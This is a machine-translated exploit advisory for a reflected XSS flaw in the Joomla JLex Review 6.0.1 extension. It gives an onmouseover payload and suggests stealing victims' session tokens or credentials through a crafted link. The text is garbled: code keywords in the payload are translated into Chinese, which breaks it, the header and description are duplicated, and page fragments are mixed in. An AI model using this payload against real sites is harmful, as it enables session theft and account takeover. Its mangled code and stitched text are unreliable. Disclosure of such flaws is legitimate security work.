#利用标题: JOOMLA JLEX评论6.0.1-反映XSS
#利用作者:饼干
#日期: 01/08/2023
#vendor: jlexart
#供应商HomePage: https://jlexart.com/
#软件link: https://extensions.joomla.org/extension/jlex-review/
#demo: https://jlexreview.jlexart.com/
#版本: 6.0.1
#测试在: Windows 10 Pro
#Impact:操纵网站的内容
## 问候
the_pitbull,raz0r,ins,sadsoul,his0k4,hussin x,sql先生,moizsid09,indoushka
cryptojob(Twitter)twitter.com/0x0cryptojob
## 描述
攻击者可以将电子邮件或即时消息中包含恶意URL的链接发送给受害者
可以执行各种各样的动作,例如窃取受害者的会议令牌或登录凭据
路径: /
URL参数容易受到XSS的影响
XSS有效载荷:
itwed'onmouseover='确认(1)'样式='位置:absolute; width:100%;高度:100%; top:0; top:0; left:0;'b7yzn
#利用作者:饼干
#日期: 01/08/2023
#vendor: jlexart
#供应商HomePage: https://jlexart.com/
#软件link: https://extensions.joomla.org/extension/jlex-review/
#demo: https://jlexreview.jlexart.com/
#版本: 6.0.1
#测试在: Windows 10 Pro
#Impact:操纵网站的内容
## 问候
the_pitbull,raz0r,ins,sadsoul,his0k4,hussin x,sql先生,moizsid09,indoushka
cryptojob(Twitter)twitter.com/0x0cryptojob
## 描述
攻击者可以将电子邮件或即时消息中包含恶意URL的链接发送给受害者
可以执行各种各样的动作,例如窃取受害者的会议令牌或登录凭据
路径: /
URL参数容易受到XSS的影响
正在加载...
website
itwed'onmouseover='确认(1)'样式='位置:absolute; width:100%;高度:100%; top:0; top:0; left:0;'b7yzn